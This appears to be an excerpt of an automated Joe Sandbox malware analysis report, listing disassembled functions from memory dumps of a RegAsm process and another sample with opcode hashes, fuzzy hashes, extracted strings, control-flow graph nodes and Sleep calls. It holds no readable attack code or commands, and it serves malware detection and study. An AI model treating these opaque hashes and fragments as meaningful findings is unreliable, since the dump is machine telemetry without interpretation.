                                                      • Opcode ID: 1eb8afaf585ab7a1444f87f006f6d25b6cf3dcfb8ea8ed8559fef964d803de29
                                                      • Instruction ID: 8b185a47cb8a51e18de38d451b34055b6d745d5f88e13bd6899a3910ee535924
                                                      • Opcode Fuzzy Hash: 1eb8afaf585ab7a1444f87f006f6d25b6cf3dcfb8ea8ed8559fef964d803de29
                                                      • Instruction Fuzzy Hash: 25C117B18227498BD721CF25E85A28E7FF9BB81328F544319E2616F2E5DFB4144ACF44
                                                      Function 07017BA8 Relevance: .2, Instructions: 232COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0951128752227c924836a04921e35b73468ce5ff1fc0c91fd45c738586492a59
                                                      • Instruction ID: fbd77ce2fb97b178fe4417e412db991f6955ace8e425aef70be49b767e944753
                                                      • Opcode Fuzzy Hash: 0951128752227c924836a04921e35b73468ce5ff1fc0c91fd45c738586492a59
                                                      • Instruction Fuzzy Hash: 9AB1DAB4E01229CFDB64DF69C854B9DBBB2BF89300F1085AAD409AB355DB309E85CF50
                                                      Function 07013720 Relevance: .2, Instructions: 228COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7aec9cafda77672aeb938ea41fde0284e7481f08c1330a943eacadc14cef165e
                                                      • Instruction ID: 3d2f90570453ab91046d5c319bb4002541d1e298f6c968675da9b51d81a11e03
                                                      • Opcode Fuzzy Hash: 7aec9cafda77672aeb938ea41fde0284e7481f08c1330a943eacadc14cef165e
                                                      • Instruction Fuzzy Hash: 5AA1E670E01228DFEB28DFA5D850B9EBBB2BF88300F2081AAD50967354DB355E85DF51
                                                      Function 07013D60 Relevance: .2, Instructions: 197COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c742cbf0b40138fc7b7bab0e7819fc208beff3f00ad523c0d12ec927c81d0d7d
                                                      • Instruction ID: 2dac88eb09f392b84f2c0dbc97d951271064509dc892f7411ad976fb6883446c
                                                      • Opcode Fuzzy Hash: c742cbf0b40138fc7b7bab0e7819fc208beff3f00ad523c0d12ec927c81d0d7d
                                                      • Instruction Fuzzy Hash: 0791D8B0D012298BDB68DF6AC854BDEBBB2BF88300F10C1EAD509A7254DB755E85CF50
                                                      Function 070185C8 Relevance: .2, Instructions: 190COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: a3a143d00dacee058ccc26ddeb322347da104171412854fa330eda5899001575
                                                      • Instruction ID: eb551997c23c06b50e37b37e2adc12610312a006f0f11dd9d22239766a259ed6
                                                      • Opcode Fuzzy Hash: a3a143d00dacee058ccc26ddeb322347da104171412854fa330eda5899001575
                                                      • Instruction Fuzzy Hash: 8591D4B4E01328CFDB64DFA9D954B9DBBB2FF49300F1081A9D409A7255EB30AA85CF41
                                                      Function 07016508 Relevance: .2, Instructions: 153COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fdf0f9303571a9f4fad934227b43b26f985a4c1c803e9f55bd75dfe6a393cba1
                                                      • Instruction ID: 4faea448e4da453f2fd047d7177107d3367de7e06b6fc766ef3a2cf1af822be5
                                                      • Opcode Fuzzy Hash: fdf0f9303571a9f4fad934227b43b26f985a4c1c803e9f55bd75dfe6a393cba1
                                                      • Instruction Fuzzy Hash: 6151D770E012189FDB28DF6AC851BDEBBB2BF89300F14D1A9D509AB254DB359E81CF51
                                                      Function 07017042 Relevance: .1, Instructions: 101COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 64143fefdbe952b1ea16f444980fa4b3f96943a60ecfc6a23568f74e21c17a2e
                                                      • Instruction ID: 9c64b51906de13509edf7de30b1bdac6419b1617171c657c834303f57f64d9a3
                                                      • Opcode Fuzzy Hash: 64143fefdbe952b1ea16f444980fa4b3f96943a60ecfc6a23568f74e21c17a2e
                                                      • Instruction Fuzzy Hash: 2B41F7B0E013098BDB28DFAAC94069EFBF2BF89300F24D12AC419BB254DB345942CF51
                                                      Function 07017B98 Relevance: .1, Instructions: 98COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: afd74e1b999fc65a4cc2432aba458f9fac1f0f418171372f911a76e2cb01c364
                                                      • Instruction ID: f043525819eb2faf5dbc8b0bcdeb187549bb29921c599bb1473871e3a1e29460
                                                      • Opcode Fuzzy Hash: afd74e1b999fc65a4cc2432aba458f9fac1f0f418171372f911a76e2cb01c364
                                                      • Instruction Fuzzy Hash: 2F3107B1D01619DBEB29CFA6C8407DEFBB7AF89300F10C169D819AB255DB705986CF50
                                                      Function 07011251 Relevance: .1, Instructions: 88COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 322e8fa29a82b47b17377490a243dcdfa856fc9429dcd9bcc3332be5d94e1a51
                                                      • Instruction ID: 0ba6365e0edbb4d90dc62baf21a7a626f3cbda4c157e0ada0190761df20d7647
                                                      • Opcode Fuzzy Hash: 322e8fa29a82b47b17377490a243dcdfa856fc9429dcd9bcc3332be5d94e1a51
                                                      • Instruction Fuzzy Hash: D13192B1E016189BEB18CFABD9445DEFBF7AFC9300F14D12AD518AB258EB305946CB50
                                                      Function 07015390 Relevance: .1, Instructions: 84COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40c3b3b21a1f2dae198962f22d8663e0e7e4afe6b23efdcec1ee501d46adffb3
                                                      • Instruction ID: 637da8c5302e3e33f951ec61f3d9c554ce04a61a65932a361d7dd09583dd6e81
                                                      • Opcode Fuzzy Hash: 40c3b3b21a1f2dae198962f22d8663e0e7e4afe6b23efdcec1ee501d46adffb3
                                                      • Instruction Fuzzy Hash: 7E31D4B1D01658DBEB18CFAAD8046DEBBF6AFC9300F14C52AD419BB264EB701906CB50
                                                      Function 07014DC1 Relevance: .0, Instructions: 25COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: dd7f6b98e13f58b80e54eb3577967d70ac4283a524dd9c66c167ded64aa51d82
                                                      • Instruction ID: 4822df02ebd736412cbd72fc2d66a3cc9a437602a139dcd792cfb62d3521f6a1
                                                      • Opcode Fuzzy Hash: dd7f6b98e13f58b80e54eb3577967d70ac4283a524dd9c66c167ded64aa51d82
                                                      • Instruction Fuzzy Hash: 68E0D8F0D5510DCADB14CFA1C0017FEFAB0AB46304F60A505941677250CB70CA448F65
                                                      Function 068FE2C7 Relevance: 46.6, Strings: 37, Instructions: 387COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2676179950
                                                      • Opcode ID: 11345c44addbdd2eaf065000493e247b3eede1db939791dc8e8ff2f4872932c1
                                                      • Instruction ID: dac7e4de65e279ceb5a9d894c53c91ebdbbaf94a17d16a076f53653982bd7439
                                                      • Opcode Fuzzy Hash: 11345c44addbdd2eaf065000493e247b3eede1db939791dc8e8ff2f4872932c1
                                                      • Instruction Fuzzy Hash: F5D1BF30300711ABD6066EF29C61A6EBE93FB96710B40452DC2184F7A9EF716D2A4397
                                                      Function 068FE2D8 Relevance: 46.6, Strings: 37, Instructions: 383COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2676179950
                                                      • Opcode ID: e8c5a3a763930c60269846a787d96115d383e29bae69eb30651185c3a1797bfb
                                                      • Instruction ID: daab9708baa79140e4ba76f567c007d1404d2296ee164bce723489689de787e9
                                                      • Opcode Fuzzy Hash: e8c5a3a763930c60269846a787d96115d383e29bae69eb30651185c3a1797bfb
                                                      • Instruction Fuzzy Hash: 9FD1AF30300711ABD6067EF29C61A6DBE93BBAA710B80453DD3144F799EF716D2A4397
                                                      Function 068FCC7F Relevance: 16.4, Strings: 13, Instructions: 151COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-1503062911
                                                      • Opcode ID: ea79aae3f73b24f2aa427024f7a95a33822a2579509690e1e553862886cbfc02
                                                      • Instruction ID: 3593d3d26d7291042ebfc2a0b5e8cfbdd52c565ede7f3f7f2b503fd1027ec39f
                                                      • Opcode Fuzzy Hash: ea79aae3f73b24f2aa427024f7a95a33822a2579509690e1e553862886cbfc02
                                                      • Instruction Fuzzy Hash: 5141C3303007112BD6067EB29C51B2E7E93FB96610B40497DD3184F799EF766E2A439B
                                                      Function 068FCC90 Relevance: 16.4, Strings: 13, Instructions: 143COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-1503062911
                                                      • Opcode ID: 92ca5270bec009f6c22d2eeb264bfd6414ee35615da800a0bf27e3d8febb6338
                                                      • Instruction ID: a618e2ff50cc7cc9f1296fffb9320fe9457272e9747c5a7fb0fefed36eec20ae
                                                      • Opcode Fuzzy Hash: 92ca5270bec009f6c22d2eeb264bfd6414ee35615da800a0bf27e3d8febb6338
                                                      • Instruction Fuzzy Hash: EF41B4303007112BD6067EB29C5172E7E93FB96610B40493DD3184F799EF766D2A439B
                                                      Function 0701EDB0 Relevance: 15.1, Strings: 12, Instructions: 141COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq
                                                      • API String ID: 0-2428010233
                                                      • Opcode ID: b4b800b24544b8a447ab74098ad4215882efe0cc04eea8ec88031f3f6c620be9
                                                      • Instruction ID: 54b95e4f6db1a4e93a1a08d2fe52817448067d0aaa3389c28e76c87dc3635772
                                                      • Opcode Fuzzy Hash: b4b800b24544b8a447ab74098ad4215882efe0cc04eea8ec88031f3f6c620be9
                                                      • Instruction Fuzzy Hash: 3A514E74E0021A9FEB05EFA5E851BAF7BB2FF90710F105519D9002F39DDA726E098B91
                                                      Function 0701EDC0 Relevance: 15.1, Strings: 12, Instructions: 140COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1670693539.0000000007010000.00000040.00000800.00020000.00000000.sdmp, Offset: 07010000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_7010000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: `Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq$`Qq
                                                      • API String ID: 0-2428010233
                                                      • Opcode ID: 6be4483944859049e52fa4f1044f4fc90800b21879a5310962059780845a4448
                                                      • Instruction ID: ea9e61710168c8326f9f3b2cb055bbb89450cd77ccd33ee1e416a9a27008fa16
                                                      • Opcode Fuzzy Hash: 6be4483944859049e52fa4f1044f4fc90800b21879a5310962059780845a4448
                                                      • Instruction Fuzzy Hash: CE515E74E0021E9FEB05EFA5E841BAF7BB2FF90710F105519D9002F398DA726E098B91
                                                      Function 068FCED1 Relevance: 10.1, Strings: 8, Instructions: 105COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2013526696
                                                      • Opcode ID: 93380c1e31527c8218b2939c7073a32728ec8e71f477093f31688041d3eb61e6
                                                      • Instruction ID: 7d364ce656cd44d9578fd325843e195933fc78086f01a174b67eddaba481db3d
                                                      • Opcode Fuzzy Hash: 93380c1e31527c8218b2939c7073a32728ec8e71f477093f31688041d3eb61e6
                                                      • Instruction Fuzzy Hash: 6A31F3303003122BD7026EB29C50B6EBE93FB96610B40497DE3184F799EF716E29439B
                                                      Function 068FCEE0 Relevance: 10.1, Strings: 8, Instructions: 93COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2013526696
                                                      • Opcode ID: 6216d598c619e0a6266c1e9a9f40123d1dfed7129d91d42b7f97e54d09cd5c61
                                                      • Instruction ID: 1ae78f139604bef45362fbd576e660d78be37da38c7b1d7618ce8f5fe26bc9ed
                                                      • Opcode Fuzzy Hash: 6216d598c619e0a6266c1e9a9f40123d1dfed7129d91d42b7f97e54d09cd5c61
                                                      • Instruction Fuzzy Hash: 5221B1307003122BDA066EB29C50B2EBE93FB96610B80493DD3184F799EF757D29439B
                                                      Function 068FC968 Relevance: 8.8, Strings: 7, Instructions: 89COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-1560639744
                                                      • Opcode ID: f6ef2145a416e86a93fdde461e19e24e9adf2198327e7cdfd9c853f9823f14e7
                                                      • Instruction ID: 2698b94e5d3cd666b7129fb54c237fbdbaf5a4880b26c8e6f8e8d9ac385885ea
                                                      • Opcode Fuzzy Hash: f6ef2145a416e86a93fdde461e19e24e9adf2198327e7cdfd9c853f9823f14e7
                                                      • Instruction Fuzzy Hash: FD31E1303012426FDB026FB29C44A6E7FA3FB96610740456DE1058F7AADE706E5B8B82
                                                      Function 068FC978 Relevance: 8.8, Strings: 7, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-1560639744
                                                      • Opcode ID: e1989b05a23d4bc29cd2a2ee6d2b1eb75459a40f8d0a081363c4bbcb43a717b6
                                                      • Instruction ID: 8e73364cab6afe1368a5c0ff4c23b59cb7306104104ac81f2926142d619f6dd8
                                                      • Opcode Fuzzy Hash: e1989b05a23d4bc29cd2a2ee6d2b1eb75459a40f8d0a081363c4bbcb43a717b6
                                                      • Instruction Fuzzy Hash: 8121E2303002026BDB066FF2DC44A6E7FA3FB96610740457DE1058F7A9DE706E5B8B82
                                                      Function 068FD538 Relevance: 7.6, Strings: 6, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2987039804
                                                      • Opcode ID: 7cd7d798d8e4684c795f1bafba0563ac810ea1dfadee83a979c2283478d4a06f
                                                      • Instruction ID: 89ca4c2e705d413f852bfd02cd1863cb2c9079ea536fc7c0280af13844ebeabf
                                                      • Opcode Fuzzy Hash: 7cd7d798d8e4684c795f1bafba0563ac810ea1dfadee83a979c2283478d4a06f
                                                      • Instruction Fuzzy Hash: 352104307003112BD7026FB29C50B6EBE93FB96A10B40467DD2044F799EF726E2A43A7
                                                      Function 068FD548 Relevance: 7.6, Strings: 6, Instructions: 73COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Dej$Dej$Dej$Dej$Dej$Dej
                                                      • API String ID: 0-2987039804
                                                      • Opcode ID: fe2921c2103c6f716a5e43f474a62cf8c070b3db9fb6717419aa71bdfd4395b3
                                                      • Instruction ID: a1cb9fa3e42c57ae8e4fc47b5cef9099b0a04e60b310b6747bdb00dffcdcf96a
                                                      • Opcode Fuzzy Hash: fe2921c2103c6f716a5e43f474a62cf8c070b3db9fb6717419aa71bdfd4395b3
                                                      • Instruction Fuzzy Hash: 4E11D2307003112BD6026FB29C50B2EBE93FB96A10B40463DD2184F798EF726D2A4397
                                                      Function 068FED10 Relevance: 5.2, Strings: 4, Instructions: 242COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000B.00000002.1668932978.00000000068F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 068F0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_11_2_68f0000_RegAsm.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (_q$(_q$(_q$(_q
                                                      • API String ID: 0-1088526261
                                                      • Opcode ID: 906415815005b02fa48ded3aef3f77f2fd361f0d85798d933888da46bcc32193
                                                      • Instruction ID: eb905e027d6332a6bdf3213be0a1a481917741c62fc770dabc9e34f3de471ae1
                                                      • Opcode Fuzzy Hash: 906415815005b02fa48ded3aef3f77f2fd361f0d85798d933888da46bcc32193
                                                      • Instruction Fuzzy Hash: 8791CF75A04304AFDB04AF78D41466E7FB2EF85210F5484AEED06DB391EA359D02CBD2

                                                      Execution Graph

                                                      Execution Coverage:6.4%
                                                      Dynamic/Decrypted Code Coverage:100%
                                                      Signature Coverage:0%
                                                      Total number of Nodes:6
                                                      Total number of Limit Nodes:0
                                                      execution_graph 19733 1815d58 19734 1815d5c 19733->19734 19736 1815e6d 19734->19736 19737 1815ce4 19734->19737 19738 181a040 Sleep 19737->19738 19740 181a0ae 19738->19740 19740->19734

                                                      Executed Functions

                                                      Function 05D25F90 Relevance: 5.2, Strings: 4, Instructions: 196COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 0 5d25f90-5d25fbe 2 5d25fc0 0->2 3 5d25fca-5d25feb 0->3 2->3 7 5d25ff1-5d25ff5 3->7 8 5d261da-5d261ff 3->8 9 5d26001-5d26047 7->9 10 5d25ff7-5d25ffb 7->10 12 5d26206-5d26246 8->12 26 5d26088-5d2609e 9->26 27 5d26049-5d26081 9->27 10->9 10->12 23 5d26248 12->23 24 5d26249-5d2625b 12->24 23->24 29 5d2626f-5d26272 24->29 30 5d2625d-5d26268 24->30 33 5d260a0 26->33 34 5d260a8-5d260c1 26->34 27->26 30->29 33->34 38 5d260c3-5d260f1 34->38 39 5d2611f-5d26152 34->39 45 5d260f6-5d26102 38->45 47 5d261cd-5d261d7 39->47 45->47 49 5d26108-5d2611a 45->49 49->47
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2214459460.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_5d20000_filename.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (q$(q$xq$xq
                                                      • API String ID: 0-4001314665
                                                      • Opcode ID: fe4b0c63023eb9e7451c9125e571057c13a1f04b29f57a4d1af9c8f3f68c377a
                                                      • Instruction ID: ca754a649feb941a492b724f7b9d456420e517c9ac8332add685f7a96df490ec
                                                      • Opcode Fuzzy Hash: fe4b0c63023eb9e7451c9125e571057c13a1f04b29f57a4d1af9c8f3f68c377a
                                                      • Instruction Fuzzy Hash: 95619F317002049FDB159F65C854B6EBBA3BFC8214F14846DE90A9B3A6CF36EC46CB91
                                                      Function 05D25F48 Relevance: 1.4, Strings: 1, Instructions: 152COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 401 5d25f48-5d25f8a 405 5d25f8c 401->405 406 5d25f8d-5d25f8e 401->406 405->406 407 5d25f90 406->407 408 5d25f91-5d25fbe 406->408 407->408 409 5d25fc0 408->409 410 5d25fca-5d25feb 408->410 409->410 414 5d25ff1-5d25ff5 410->414 415 5d261da-5d261ff 410->415 416 5d26001-5d26047 414->416 417 5d25ff7-5d25ffb 414->417 419 5d26206-5d26246 415->419 433 5d26088-5d2609e 416->433 434 5d26049-5d26081 416->434 417->416 417->419 430 5d26248 419->430 431 5d26249-5d2625b 419->431 430->431 436 5d2626f-5d26272 431->436 437 5d2625d-5d26268 431->437 440 5d260a0 433->440 441 5d260a8-5d260c1 433->441 434->433 437->436 440->441 445 5d260c3-5d260cf 441->445 446 5d2611f-5d26152 441->446 450 5d260d7-5d260f1 445->450 454 5d261cd-5d261d7 446->454 452 5d260f6-5d26102 450->452 452->454 456 5d26108-5d2611a 452->456 456->454
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2214459460.0000000005D20000.00000040.00000800.00020000.00000000.sdmp, Offset: 05D20000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_5d20000_filename.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: xq
                                                      • API String ID: 0-3670251435
                                                      • Opcode ID: da9b0ba2628458c8086f811e4fa1e558492b190912f6948dd56b45013b98cbb8
                                                      • Instruction ID: e203a11b9ff53f70c68838d4426233fab684abcecd39027b5242dc506120ec8e
                                                      • Opcode Fuzzy Hash: da9b0ba2628458c8086f811e4fa1e558492b190912f6948dd56b45013b98cbb8
                                                      • Instruction Fuzzy Hash: B851E7316003009FDB15DF28C894BAA7BA2FF84314F148469D45A8F3A6DB32EC46CB91
                                                      Function 01815CE4 Relevance: 1.3, APIs: 1, Instructions: 44sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 483 1815ce4-181a0ac Sleep 486 181a0b3-181a0c7 483->486 487 181a0ae 483->487 487->486
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2207958412.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1810000_filename.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
                                                      • Opcode ID: df4ca43903f58f86cb1005dec78247cd3fb6b16e534f8590f4201af61ba6518f
                                                      • Instruction ID: 82abe75fb0ff471d8545ca810ca690464338eb650451b9d172d58f8131340779
                                                      • Opcode Fuzzy Hash: df4ca43903f58f86cb1005dec78247cd3fb6b16e534f8590f4201af61ba6518f
                                                      • Instruction Fuzzy Hash: 261103B5800389CFDB24DF9AC545BDEBBF4EB48324F208069D918A7240C775A945CFA5
                                                      Function 0181A039 Relevance: 1.3, APIs: 1, Instructions: 41sleepCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 488 181a039-181a0ac Sleep 490 181a0b3-181a0c7 488->490 491 181a0ae 488->491 491->490
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 0000000D.00000002.2207958412.0000000001810000.00000040.00000800.00020000.00000000.sdmp, Offset: 01810000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_13_2_1810000_filename.jbxd
                                                      Similarity
                                                      • API ID: Sleep
                                                      • String ID:
                                                      • API String ID: 3472027048-0
